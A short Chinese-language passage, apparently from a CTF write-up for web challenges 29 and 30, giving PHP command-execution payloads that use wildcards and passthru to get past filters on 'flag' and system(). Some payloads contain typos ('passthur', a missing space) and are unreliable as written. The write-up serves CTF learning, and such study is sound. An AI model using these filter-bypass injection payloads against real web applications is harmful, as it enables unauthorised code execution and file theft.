web291.传入c参数来进行代码执行，payload: c=system("catfla*.php");  如图2.浏览器默认不显示php的标签所以需要右键查看源代码web30题目过滤了命令执行函数system，还可以用passthur()，过滤的字符可以用？代替单个字符。payload:?c=passthur("catfla?.p?p");查看源